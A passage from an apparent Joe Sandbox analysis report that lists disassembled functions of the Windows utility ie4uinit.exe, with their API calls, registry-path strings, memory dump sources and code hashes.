SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6B5230154), ref: 00007FF6B52306BB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6B5230154), ref: 00007FF6B52306C5
CreateFile2.KERNEL32 ref: 00007FF6B523071F
SetFileAttributesW.KERNEL32 ref: 00007FF6B5230739
GetLastError.KERNEL32 ref: 00007FF6B523073F

Strings

, xrefs: 00007FF6B52306ED

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: AttributesErrorFileLast$CreateFile2FreeLocal
String ID:
API String ID: 2781035858-3916222277
Opcode ID: 75e005b9699e5455942652526394a3ab6485b3005affdd580e4356f9e02592a8
Instruction ID: 550012ead8b895d1dfe7458de230bce7809fda7a458a7a44c9813b5306ea60c6
Opcode Fuzzy Hash: 75e005b9699e5455942652526394a3ab6485b3005affdd580e4356f9e02592a8
Instruction Fuzzy Hash: 5721EC31A097814BE3508B1ADA843AA7794FB40FA4F108331EB5983699DF3CE852CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5213860 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32 ref: 00007FF6B52138B2
RegCloseKey.ADVAPI32 ref: 00007FF6B52138BD
RegCreateKeyExW.ADVAPI32 ref: 00007FF6B52138FD
RegSetValueExW.ADVAPI32 ref: 00007FF6B521392A
RegCloseKey.ADVAPI32 ref: 00007FF6B5213937

Strings

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}, xrefs: 00007FF6B52138D8

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CloseValue$CreateQuery
String ID: Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}
API String ID: 1259008579-2693928049
Opcode ID: fa3c6562d16f9ec3f27cc905cbd6113ed540c65d56b383c802243fa307ee1393
Instruction ID: 6fdaf845aaea55ef2b51d11bbc087e74a2d47a30b52a71bff8f0f08e7bec1139
Opcode Fuzzy Hash: fa3c6562d16f9ec3f27cc905cbd6113ed540c65d56b383c802243fa307ee1393
Instruction Fuzzy Hash: 29216F32608B8186DB60CF65F95075AB7A4FB88BA4F444131EB8D83B19DF7CD545CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5231CA4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI ref: 00007FF6B5231D07
CharNextW.USER32 ref: 00007FF6B5231D2F
#123.MLANG ref: 00007FF6B5231D4D
GetUserDefaultLocaleName.KERNEL32 ref: 00007FF6B5231D76

Strings

Software\Microsoft\Internet Explorer\International, xrefs: 00007FF6B5231CF9
AcceptLanguage, xrefs: 00007FF6B5231CF2

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: #123CharDefaultLocaleNameNextUserValue
String ID: AcceptLanguage$Software\Microsoft\Internet Explorer\International
API String ID: 3091204316-784331173
Opcode ID: 82e52de1dba4405c66008f4613a68f563b53643b435c245afd9ada4c00769008
Instruction ID: defe383c071588015c607f521bced3c5aa30f42f7974b4ec9c9846adff276ba9
Opcode Fuzzy Hash: 82e52de1dba4405c66008f4613a68f563b53643b435c245afd9ada4c00769008
Instruction Fuzzy Hash: A621623160AA8689EB749B19FA402FA7364FF85F84F401132EB8D8269EDF7CD945C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521E00C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF6B521E025
SysStringLen.OLEAUT32 ref: 00007FF6B521E03E
VarBstrCat.OLEAUT32 ref: 00007FF6B521E059
SysFreeString.OLEAUT32 ref: 00007FF6B521E068
SysFreeString.OLEAUT32 ref: 00007FF6B521E0C4

Strings

&pc=, xrefs: 00007FF6B521E01E

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$Free$AllocBstr
String ID: &pc=
API String ID: 3761010647-3864277979
Opcode ID: f2a711594d89ea37a6fb04fef30606c5b4dd56d41889d6de13aa309feccaaa9f
Instruction ID: 5f11a0566573da92d83e635d2d391c72e0529b9b1957918bd477d37e6c611e02
Opcode Fuzzy Hash: f2a711594d89ea37a6fb04fef30606c5b4dd56d41889d6de13aa309feccaaa9f
Instruction Fuzzy Hash: A9215B2561965642EB148B29EE503AA6770FF88FC0F184031DF4E97B5ECF3EE8458700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5230574 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON

Download Yara Rule

APIs

#654.IERTUTIL ref: 00007FF6B52305B2
ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6B52305D9
#654.IERTUTIL ref: 00007FF6B523064D

Part of subcall function 00007FF6B5211394: _vsnwprintf.MSVCRT ref: 00007FF6B52113D4

Part of subcall function 00007FF6B52168FC: #654.IERTUTIL(?,?,?,?,?,?,00007FF6B522AC8F), ref: 00007FF6B5216925

Strings

-CleanupEmeDataStores, xrefs: 00007FF6B52305E3
%windir%, xrefs: 00007FF6B52305CD
%s\system32\ie4uinit.exe %s, xrefs: 00007FF6B52305F9

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: #654$EnvironmentExpandStrings_vsnwprintf
String ID: %s\system32\ie4uinit.exe %s$%windir%$-CleanupEmeDataStores
API String ID: 3028992113-2826242292
Opcode ID: 40b2c27b4dd8a2bf901222e9343f66ee967b6b5a9d4fdc837f57397a1ff74fbe
Instruction ID: db15a0eebb922b0c2b87e4d62239c7eabff0b4c5895ba2211f58ea156e9235aa
Opcode Fuzzy Hash: 40b2c27b4dd8a2bf901222e9343f66ee967b6b5a9d4fdc837f57397a1ff74fbe
Instruction Fuzzy Hash: 3D21326171AA8286E720DB19ED547EA3364FB88B44F801032DB4DC666EDF3DE908CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522B558 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

OpenMutexW.KERNEL32 ref: 00007FF6B522B575
CloseHandle.KERNEL32 ref: 00007FF6B522B5B4
GetLastError.KERNEL32 ref: 00007FF6B522B5BE
GetLastError.KERNEL32 ref: 00007FF6B522B5D2

Part of subcall function 00007FF6B522B5FC: CreateMutexW.KERNEL32 ref: 00007FF6B522B620
Part of subcall function 00007FF6B522B5FC: #50.IERTUTIL ref: 00007FF6B522B635
Part of subcall function 00007FF6B522B5FC: GetCurrentProcess.KERNEL32 ref: 00007FF6B522B641
Part of subcall function 00007FF6B522B5FC: GetCurrentProcess.KERNEL32 ref: 00007FF6B522B64A
Part of subcall function 00007FF6B522B5FC: DuplicateHandle.KERNEL32 ref: 00007FF6B522B66E
Part of subcall function 00007FF6B522B5FC: CloseHandle.KERNEL32 ref: 00007FF6B522B6BA

GetLastError.KERNEL32 ref: 00007FF6B522B5DF

Strings

Local\IEHistJournalGlobal_3bf1c317-e96b-46f6-ba88-50c001d497aa, xrefs: 00007FF6B522B564, 00007FF6B522B58D

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorHandleLast$CloseCurrentMutexProcess$CreateDuplicateOpen
String ID: Local\IEHistJournalGlobal_3bf1c317-e96b-46f6-ba88-50c001d497aa
API String ID: 3831808724-600561470
Opcode ID: 1eba9c7770c4911a21616fb2a1f726ecb7f0e6bc2a1f79f8a7e266fa825036e4
Instruction ID: ba0789063481247fb62faf8aa0370dc0889391d1a6b512da8014f7813b3396b6
Opcode Fuzzy Hash: 1eba9c7770c4911a21616fb2a1f726ecb7f0e6bc2a1f79f8a7e266fa825036e4
Instruction Fuzzy Hash: D7117768B2BA4745FB509B2E9E843B662D4EF44F40F44003CDB0EC915AEF3DEC958210

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5228D00 Relevance: 9.1, APIs: 6, Instructions: 149COMMON

Download Yara Rule

APIs

#662.IERTUTIL ref: 00007FF6B5228D92
#665.IERTUTIL ref: 00007FF6B5228DBC
#655.IERTUTIL ref: 00007FF6B5228DF9
#657.IERTUTIL ref: 00007FF6B5228EEE
#657.IERTUTIL ref: 00007FF6B5228F2C

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: #657$#655#662#665
String ID:
API String ID: 3924366864-0
Opcode ID: 4159ae4d45c5697a284a93313c2f09ae272334516a9ae8de86438e237adab41f
Instruction ID: 38e4d85d2448754287809abfc50b5862038043e18807ea23f33de1b4484e3df1
Opcode Fuzzy Hash: 4159ae4d45c5697a284a93313c2f09ae272334516a9ae8de86438e237adab41f
Instruction Fuzzy Hash: F9519626A1E64686E7708F19EA406EA7760FB84B44F800035EB8D8365ADF7EED45CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52319F4 Relevance: 9.1, APIs: 6, Instructions: 134COMMON

Download Yara Rule

APIs

PathIsURLW.SHLWAPI ref: 00007FF6B5231A3F
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6B5231AB9
UrlCreateFromPathW.SHLWAPI ref: 00007FF6B5231AE2
UrlCreateFromPathW.SHLWAPI ref: 00007FF6B5231B23
UrlApplySchemeW.SHLWAPI ref: 00007FF6B5231B9E
UrlApplySchemeW.SHLWAPI ref: 00007FF6B5231BC9

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Path$ApplyCreateFromScheme$CurrentDirectory
String ID:
API String ID: 3179412715-0
Opcode ID: 36687576c733e74d40890e99678a98e260cc5f596f0255489ef1bfa0f9dd2c22
Instruction ID: 2a4e35525e91a4e00423e8337b37fbb6cbe1a7634dc25c2d8193525b93f198fb
Opcode Fuzzy Hash: 36687576c733e74d40890e99678a98e260cc5f596f0255489ef1bfa0f9dd2c22
Instruction Fuzzy Hash: E7518422B197528AEB24DB69EA806ED6771BB84B84F005135EF0E93B5EDF3CD845C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5229DB0 Relevance: 9.1, APIs: 6, Instructions: 108COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6B5229E0E
memset.MSVCRT ref: 00007FF6B5229E1F
memset.MSVCRT ref: 00007FF6B5229E35
memset.MSVCRT ref: 00007FF6B5229E44
StrCmpICW.SHLWAPI ref: 00007FF6B5229F15
StrCmpICW.SHLWAPI ref: 00007FF6B5229F2A

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8faa8bd29350d385c0f7d56c91be330b0c651c18d62ad2940fbdcfbe6e2f6fc0
Instruction ID: f8f58c688a22e3bdacfa12509e134f9078c42049c0b09d1b468440afb4ec9e64
Opcode Fuzzy Hash: 8faa8bd29350d385c0f7d56c91be330b0c651c18d62ad2940fbdcfbe6e2f6fc0
Instruction Fuzzy Hash: B7418076B19A8189EF24DB2ADD841E92361FB84F84F444072EF4D87769EE3CCA46C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5211440 Relevance: 9.1, APIs: 6, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 00007FF6B521148B
SysAllocStringLen.OLEAUT32 ref: 00007FF6B52114AB
SysStringLen.OLEAUT32 ref: 00007FF6B52114BC
memcpy_s.MSVCRT ref: 00007FF6B52114D8
memcpy_s.MSVCRT ref: 00007FF6B521150A
SysFreeString.OLEAUT32 ref: 00007FF6B5211533

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$memcpy_s$AllocFree
String ID:
API String ID: 3865269606-0
Opcode ID: 81a72f27ff1604e15389ff94b771ce57766a2f0e90da50425343f37cfd5eefd1
Instruction ID: e81183037bff610697931a651e546dbb68e63ee96764f33310c95858fbe88505
Opcode Fuzzy Hash: 81a72f27ff1604e15389ff94b771ce57766a2f0e90da50425343f37cfd5eefd1
Instruction Fuzzy Hash: AC31D661A0A71385EA389F5DDF541BA22E1AF44F90F244635CB5EC779ECE3EEC818200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522365C Relevance: 9.1, APIs: 6, Instructions: 95synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B522367F
GetLastError.KERNEL32(?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B522368C
GetLastError.KERNEL32(?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B522369B
GetLastError.KERNEL32(?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B52236AA
#672.IERTUTIL(?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B522375B
ReleaseMutex.KERNEL32(?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B522379E

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$#672MutexObjectReleaseSingleWait
String ID:
API String ID: 551975906-0
Opcode ID: f890399413508bcff4e04aea9eedad67a08e2c955335bdfb9d6b53a53903cee7
Instruction ID: 9046a0ff5dc0b875c3b781198be7112c564736c840264c52c50cd78b34dee9ea
Opcode Fuzzy Hash: f890399413508bcff4e04aea9eedad67a08e2c955335bdfb9d6b53a53903cee7
Instruction Fuzzy Hash: 7441B336B2A64246FB84AF3A9E402F9A295AF80F40F045134DB09C769FDF3EEC458750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521BB6C Relevance: 9.1, APIs: 6, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF6B521BB96
VarBstrCmp.OLEAUT32 ref: 00007FF6B521BBBB
SysAllocString.OLEAUT32 ref: 00007FF6B521BBCC
VarBstrCmp.OLEAUT32 ref: 00007FF6B521BBED
SysFreeString.OLEAUT32 ref: 00007FF6B521BC1A
SysFreeString.OLEAUT32 ref: 00007FF6B521BC29

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$AllocBstrFree
String ID:
API String ID: 359749342-0
Opcode ID: 5a41499bae831f50223b6bbdd408a39c1f16fd81cf794b0d9cbc16646de7f832
Instruction ID: 94e4447cb9d143cf9e96ceb1d5156885d1de2c8311efd7624fd0ff923f3c9aaa
Opcode Fuzzy Hash: 5a41499bae831f50223b6bbdd408a39c1f16fd81cf794b0d9cbc16646de7f832
Instruction Fuzzy Hash: 5631EE26A0AA5645EA249F19FE446BA6370FF48F90F144031DF1E87B5EDE3DEC458700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521FCF0 Relevance: 9.1, APIs: 6, Instructions: 93synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF6B521FD45
GetLastError.KERNEL32 ref: 00007FF6B521FD52
GetLastError.KERNEL32 ref: 00007FF6B521FD66
GetLastError.KERNEL32 ref: 00007FF6B521FD75
QISearch.SHLWAPI ref: 00007FF6B521FDF7

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$ObjectSearchSingleWait
String ID:
API String ID: 3990731185-0
Opcode ID: 78a2dacb3004dc604bd8e63d7e59dca6da4c961abe510b53ee60f7bc56371330
Instruction ID: 137cc9f42c5a792643f8d7270cd967d234db34e3c75dc20a3adfed1497692a60
Opcode Fuzzy Hash: 78a2dacb3004dc604bd8e63d7e59dca6da4c961abe510b53ee60f7bc56371330
Instruction Fuzzy Hash: 35415E21B0AB9686FA549B6ADE803B967A4AF44FC0F040135DB1DC779ADF3DEC518350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52251E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF6B5225231
GetLastError.KERNEL32 ref: 00007FF6B52252D8

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B522563D), ref: 00007FF6B5225277
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B522563D), ref: 00007FF6B522528C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B522563D), ref: 00007FF6B52252A0

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$ByteCharMultiWide$HeapProcess
String ID:
API String ID: 1962985005-0
Opcode ID: aff3185ef1e3244bc23dbbd19abd5943948435dbf3656b9cea03c8d9fe8fccae
Instruction ID: 4ea0191c995105ee6c89fc5f93c60899e13c222a49dad2457ff793e9271b7d65
Opcode Fuzzy Hash: aff3185ef1e3244bc23dbbd19abd5943948435dbf3656b9cea03c8d9fe8fccae
Instruction Fuzzy Hash: EC31A236B1AB4686F7109B599A843B93294AF48F90F148234DB09CB29ADF7EEC448750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522A93C Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(?,?,00000000,00007FF6B52236D0,?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B522A961
LocalFree.KERNEL32(?,?,00000000,00007FF6B52236D0,?,?,00000000,00007FF6B521D614,?,?,00000000,00007FF6B521D533), ref: 00007FF6B522A97C
memset.MSVCRT ref: 00007FF6B522A9FE

Strings

Software\Policies\Microsoft\Internet Explorer, xrefs: 00007FF6B522AA20
Software\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF6B522AA0E
Software\Policies\Microsoft\Internet Explorer\Infodelivery, xrefs: 00007FF6B522AA27

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Local$AllocFreememset
String ID: Software\Microsoft\Windows\CurrentVersion\Policies$Software\Policies\Microsoft\Internet Explorer$Software\Policies\Microsoft\Internet Explorer\Infodelivery
API String ID: 3749828606-3808456074
Opcode ID: 037b18cafb6c44494c45b234c174aac7b11738ca692228279d25545a2d037e9d
Instruction ID: 425fd04d95dfc07a6478faac5be0b40bce7b225c3d80a619369e1264e3db1ad7
Opcode Fuzzy Hash: 037b18cafb6c44494c45b234c174aac7b11738ca692228279d25545a2d037e9d
Instruction Fuzzy Hash: C9318D25E1E50286FA649B5A9E902FC6261AF48F40F914435C74EC2A8ADF7DBD928740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52239E0 Relevance: 9.1, APIs: 6, Instructions: 63synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF6B5223A09
GetLastError.KERNEL32 ref: 00007FF6B5223A16
